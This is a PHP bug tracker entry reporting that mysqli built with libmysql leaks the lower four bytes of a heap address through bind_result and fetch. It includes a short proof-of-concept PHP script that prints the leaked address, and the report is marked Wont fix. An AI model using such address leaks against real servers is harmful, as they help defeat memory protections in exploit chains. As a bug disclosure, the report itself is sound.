|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2022-01-19 06:42 UTC] stas@php.net
-Type: Security
+Type: Bug
[2022-02-15 14:25 UTC] dharman@php.net
[2022-02-15 14:25 UTC] dharman@php.net
-Status: Open
+Status: Wont fix
-Assigned To:
+Assigned To: dharman
|
|||||||||||||||||||||||||||||||||||||
Copyright © 2001-2025 The PHP GroupAll rights reserved. |
Last updated: Mon Nov 17 10:00:01 2025 UTC |
Description: ------------ When PHP is configured with libmysql instead of mysqlnd, there is a possibility to leak emalloc()ed address via simple SQL query with bind_result and fetch. This only copies the lower 4 bytes of the address, but since the MSB is fixed as 0x7f, it's reasonable to find a full heap address. I tested this in WSL + MariaDB 10.5.13 + PHP 8.2.0-dev with libmysql build Test script: --------------- <?php $mysqli = new mysqli("127.0.0.1", "test", "%"); $stmt = $mysqli->prepare("select 1"); $stmt->bind_result($a); $stmt->prepare("select 1"); $stmt->execute(); $stmt->fetch(); echo "$a"; // the lowest 4 bytes of heap structure if (!($a & (int)0xffffffff00000000)) { printf("Failed, try again\n"); die(); } printf("Address in heap leaked: 0x7fff%x\n", $a & 0xffffffff); Expected result: ---------------- Should return 1 or 0 Actual result: -------------- the lower 4 bytes of (int *)stmt->result.buf[0].val